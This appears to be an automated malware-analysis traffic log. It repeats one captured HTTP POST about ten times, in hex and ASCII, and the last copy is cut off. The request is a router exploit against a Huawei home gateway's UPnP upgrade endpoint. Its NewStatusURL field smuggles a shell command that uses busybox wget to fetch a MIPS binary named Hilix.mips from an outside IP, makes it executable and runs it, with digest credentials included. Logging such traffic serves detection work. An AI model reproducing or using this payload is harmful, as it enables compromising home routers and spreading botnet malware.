Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 